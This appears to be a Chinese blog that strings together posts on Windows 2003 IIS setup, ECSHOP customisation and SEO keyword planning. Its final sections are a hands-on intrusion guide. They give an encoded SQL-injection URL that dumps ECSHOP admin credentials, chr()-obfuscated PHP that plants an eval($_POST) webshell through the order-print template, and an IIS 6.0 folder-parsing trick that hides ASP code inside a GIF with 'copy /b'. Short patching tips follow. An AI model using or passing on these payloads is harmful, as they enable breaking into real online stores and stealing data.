Burst VPN win2003汉化语言包以及安装IIS
Burst木有分区,默认不分区只有C盘
我也懒得分区~~~安装IIS,提示木有光盘
把地址改成C:\i386就可以了!中文语言包、IIS的文件都在这里!
去掉ECSHOP 发货通知中的超链接
删除根目录 index.php中的代码
foreach ($all AS $key => $row)
{
$plugin = ROOT_PATH . ‘includes/modules/shipping/’ . $row['shipping_code'] . ‘.php’;
if (file_exists($plugin))
{
include_once($plugin);
$shipping = new $row['shipping_code'];
$all[$key]['invoice_no'] = $shipping->query((string)$row['invoice_no']);
}
}
给某个朋友的简单发广告思路
核心关键词: 复印机维修
附加地区词:深圳、龙华、深圳关内、深圳关外、深圳市内、宝安、南山……之类的自己去整理出来
(可以扩展为:深圳复印机维修,深圳维修复印机、 [地区词]复印机维修)
辅助关键词一:
上门、专业、
(可以扩展为:上门维修复印机、复印机专业维修、复印机上门维修等)
辅助关键词二:品牌词
佳能、富士康、东芝、惠普之类的关键词
搭配起来就是:佳能复印机维修 、 深圳佳能复印机维修等等
辅助关键词三:热门机型
最长维修的型号,假设佳能5000S之类的
就做深圳维修佳能5000s复印机 之类的。
辅助关键词三:公司类型
维修公司、维修店、维修电话、维修中心
辅助关键词只是一个辅助,帮助你丰富你的词库
围绕核心关键词,搭配辅助关键词,可以构建出很多有价值的关键词。
执行:
1、 确定核心与辅助关键词,并一一详细罗列
2、 根据核心与辅助关键词扩展长尾关键词,把所有关键词整理出来
3、 把所有关键词整理出来,分成几组
4、 根据关键词分组定制执行计划,比如这个月要完成那组关键词,关键词要分几天发完,每个关键词发多少个网站
笔记I
<base href=”http://www.yourdomain.com/” />
<h1></h1>
<h2></h2>
<strong> <em> <u>
<img>
ECSHOP 支付宝快捷登陆插件 官方基础修订版
ECSHOP不得不说是一个垃圾又优秀的程序,优秀在于他免费垃圾在于他跟discuz没得比,一个插件错误百出都好意思发布上来,发布上来之后有错误几个月了一堆人抱怨了也不去修正!
谁叫我们用的是免费版呢!擦!!!
找了一个高手修正后的 ECSHOP 支付宝快捷登陆插件 官方基础修订版 修正提供下载!
有需要的Email我索要吧!懒得上传了!Email:rainxq@gmail.com
演示地址:神火强光手电筒http://www.supfire360.com 有喜欢的去买一个,嘎嘎!
ECSHOP更改后台路径
1、修改admin目录为你想要的名字
2、然后修改data/config.php,把里面的define(‘ADMIN_PATH’,'admin’); 改成你刚修改的名字
3、保存上传即可!
2012年新年SEO总结!
ECSHOP 漏洞入侵
ECSHOP漏洞:
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
在程序根目录后输入上面的地址,7.1 7.2的版本会爆出管理员账号密码
爆出密码之后,用MD5解密密码
然后用管理员账号密码登陆进去,上传webshell的办法有:
1、修改模板库文件 myship ,插入一句话木马,然后根目录:http://xxx.domain.com/myship.php 就是你的一句话木马
2、打印订单:订单模板修改,查看源代码,输入
<-----?-----php
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);
$a=chr(119);
$fp=@fopen($filen,$a);
$msg=@fwrite($fp,$filec);
if($msg) echo chr(79).chr(75).chr(33);
@fclose($fp);
-----?---->
(去掉—–,这里加上去是为了防止wp自动转换掉代码)
然后保存,随便找打订单打印,之后根目录生成null.php的一句话木马,(*^__^*) 嘻嘻……
防范办法:升级到官方最新版2.7.2即可修补漏洞!
IIS 6.0 文件夹漏洞
IIS 6.0文件夹漏洞
如果文件夹为X.asp,那么这个文件夹下面的所有文件都可以执行asp语句,比如在x.asp文件夹上传xxx.gif,那么可以通过xxx.gif图片执行一句话木马
学到的命令:
CMD: copy 1.gif/b+2.asp/b asp.gif
程序漏洞关键词:power by SiteServer
程序漏洞入侵开始抵制:http://yourdomain.com/UserCenter/register.aspx
心得:
1、升级IIS6.0 修补漏洞
2、如果不需要,关闭用户注册
3、设置目录权限
